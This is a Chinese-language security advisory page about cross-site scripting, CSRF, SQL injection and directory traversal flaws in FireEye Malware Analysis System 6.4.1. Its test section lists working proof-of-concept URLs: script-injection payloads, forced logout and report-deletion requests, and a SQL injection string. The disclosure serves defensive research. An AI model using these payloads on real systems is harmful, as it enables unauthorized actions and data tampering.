安全研究
安全漏洞
安全漏洞
所有系统
AIX
BSD(eg,OpenBSD)
Digital Unix
HP-UX
IRIX
Linux
FreeBSD
SCO UNIX
SunOS
Solaris
Windows
所有类型
远程进入系统
本地越权访问
拒绝服务攻击
嵌入恶意代码
Web数据接口
其他类型
FireEye Malware Analysis System多个安全漏洞
发布日期:
2014-07-02
更新日期:
2014-07-08
受影响系统:
FireEye Malware Analysis System 6.4.1
描述:
BUGTRAQ ID:
68422
FireEye Malware Analysis System是恶意软件分析系统。
FireEye Malware Analysis System 6.4.1及其他版本在实现上存在多个跨站脚本漏洞、跨站请求伪造漏洞、SQL注入漏洞、目录遍历漏洞,攻击者可利用这些漏洞在受影响用户浏览器中执行任意脚本代码、执行未授权数据库操作。
<*来源:kmkz
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
跨站脚本:
https://www.example.com/yara/show_ya_file?name=&lt;body
onload=alert('XSSED')&gt;
https://www.example.com/network/network?new_domain=%3Cscript%3Ealert%28%27XSSED%27%29%3C%2Fscript%3E
https://www.example.com/manual/csc?mode=%3C/script%3E%3Cscript%3Ealert%28%27XSS%27%29%3C/script%3E
跨站请求伪造:
https://www.example.com/network/network?new_domain=&lt;script&gt;document.location="https://www.example.com/login/logout?notice=Deconnection+kmkz+CSRF+PoC"&lt;/script&gt;
https://www.example.com/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https://www.example.com%2Flogin%2Flogout%3Fnotice%3DDeconnection%2Bkmkz%2BCSRF%2BPoC%22%3C%2Fscript%3E
https://www.example.com/network/network?new_domain=&lt;script&gt;document.location="https://www.example.com/report/delete_pdf/?id=Alert_Details_fireye-2F_20140502_120000.xml"&lt;/script&gt;
https://www.example.com/network/network?new_domain=%3Cscript%3Edocument.location%3D%22https%3A%2F%2Fwww.example.com%2Freport%2Fdelete_pdf%2F%3Fid%3DAlert_Details_fireye-2F_20140502_120000.xml%22%3C%2Fscript%3E
SQL注入:
https://www.example.com/event_stream/send_pcap_file?ev_id=9999
OR SELECT 1,2 FROM events /**
建议:
厂商补丁:
FireEye
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.fireeye.com/products-and-solutions/forensic-analysis.html
浏览次数:
2195
严重程度:
0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客